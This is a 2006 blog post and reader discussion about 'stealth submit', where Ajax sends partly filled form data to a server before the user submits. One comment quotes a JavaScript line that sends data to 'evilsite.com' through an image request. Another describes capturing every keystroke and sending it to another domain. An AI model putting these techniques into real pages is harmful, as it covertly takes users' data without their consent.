Friday, March 10th, 2006

Sneaky Submissions Supported by Ajax?

Category: Ajax, Examples

Rian brings to light a somewhat sneaky method of using Ajax that could make web surfers out there a bit more wary to fill out the online forms they come across. The practice, what he calls a “stealth submit”, involves the submission of form data from a user’s session even before they’ve hit the submit button.

Have you ever started filling a web form and halfway into it decide against submitting because suddenly you no longer trust the website enough? You closed the browser window and that was the end of story, right? Wrong! The website might still have your information. You think it’s impossible? This article will show you how it can be done. I call the technique Stealth Submit.

He’s created an example of how this method is used – basically a Javascript event that’s fired off whenever the field is taken out of focus. The data from the field is shipped off in an Ajax request and stored somewhere server-side for future use.

Of course, his post puts more of a malicious spin on this kind of Ajax use, but there are valid reasons to use this kind of method. One that immediately comes to mind is the “username check” that some sites do to ensure that your selected name is unique in their system. It’s all about perception really…

Posted by Chris Cornutt at 10:04 am
11 Comments

+++--
3.7 rating from 50 votes

11 Comments »

Comments feed TrackBack URI

Sneaky submissions and other evil activities are “supported” by javascript in general, not limited to just ajax – ie., cross-domain scripting “vulnerabilities.”

The developer of a site could remotely load a <script> element with parameters (perhaps your cookie, if it isn’t their site?), submit form data in the same fashion – perhaps creating an iframe or loading an image, also not subject to domain restrictions, ie. var i = new Image(); i.src = 'http://www.evilsite.com/?c='+someDataHere;
Bottom line is, if you’re paranoid, I’d turn Javascript off! :)

Comment by Scott Schiller — March 10, 2006

Yeah, this isn’t really anything new. It’s pretty much the definition of AJAX, to be able to send calls in the background. Ultimately, I doubt most companies would have the audacity to use such information, nor would they see the ROI for it.

Comment by David Kaneda — March 10, 2006

No offense, David, but that sounds incredibly naive. With marketers being who they are, *any* data about customers and near customers is going to be valuable and they won’t think twice about using it — or selling it.

Comment by Charles H — March 10, 2006

I’m going to have to agree with Charles here. I worked for a rather large online advertising company (that will remain nameless) and was tasked with building an AJAXified script that would auto-attach itself to form elements and report back to the server whatever a user entered/selected, regardless of submission. I don’t remember their rationalization of this, other than collecting information on people who began filling out forms and stopped midway.

Comment by Daniel V — March 10, 2006

I would disagree there Charles, seriously, we pay lots of money to Web tracking companies who provide us with huge reports full of meaningless numbers and data about how customers use our sites. It may cost lots of money, but it is in actuality of very little value.

Comment by Chris — March 10, 2006

Any dynamically updated element could do this. For example, you could use an “onchange” or “onkeydown” or “onmousedown” call (why rely on “onblur” when you can capture each and every keystroke) to update a hidden image’s src element. Pass some information in the Querystring (for example, the form’s current state), and use a server-side script to store this information and return the same hidden image. It would work just the same as the AJAX version but wouldn’t require XMLHTTP at all. And, as Scott pointed out, you’d get past the same-domain requirement of XMLHTTP. So you could have “good looking domain” submitting your keystrokes to “overtly evil domain” or to “big advertising firm’s domain”. (Whether they are one and the same is purely a matter of opinion. ;-) )

Of course, I personally don’t see this as any flaw in AJAX (or JavaScript adjusted HTML). It’s a tool. The tool could be used for good purposes (e.g. GMail’s auto-draft saving) or bad purposes (e.g. a phisher capturing info before you hit the submit button).

Comment by Jason Levine — March 10, 2006

On a kind-of-related note, I was half-tempted to write into the guardian after their rather sensationalist article on the dangers of AJAX.
http://technology.guardian.co.uk/weekly/story/0,,1726234,00.html if anyone fancies a read

Comment by Greg — March 10, 2006

There is another take to this sneaky submit, which comes into picture when we use autofill like from google or others like gator. I wonder if when a website has hidden field for email and phone number and if someone does auto submit, if the data without the user’s knowledge gets passed along also.

Comment by Virender Dogra — March 10, 2006

Blogger, autosaves my post as a draft every now and then. That’s good, because it saves me from browser crashes (which don’t really happen for me, but still). I’d started composing a post on blogger, and decided half way through that I wasn’t ready to post it, and decided to close my browser window. Blogger had autosaved a draft a while ago, and I didn’t think anything of it.

I opened my aggregator a little while later, and right there was my half written post, autosaved, AND autopublished.

This I did not like.

Comment by Philip Tellis — March 11, 2006

This type of behaviour does give me the fear, but as this post quite rightly says – it’s also incredibly damn useful, when used legitimately(sp?).

Maybe some sort of “Save my details as I go” checkbox on forms should start appearing?

Comment by Skip Chris — March 13, 2006

Agree with ‘Skip’.
May be it’s time for a ‘Save As I go’ checkbox. But then wouldn’t everyone choose to enable that? So what’s the differnce between providing the checkbox and not providing it. Choice?
It is quite frustrating to see a post that I have carved up so painstakingly disappear in a flash (pun unintended)
At the same time it is scary to let my passwords float away into the inky voids of Cyberspace.
A middle ground, anyone?
Regards,
Shri.

Comment by Shrikant Joshi — March 15, 2006

Leave a comment

You must be logged in to post a comment.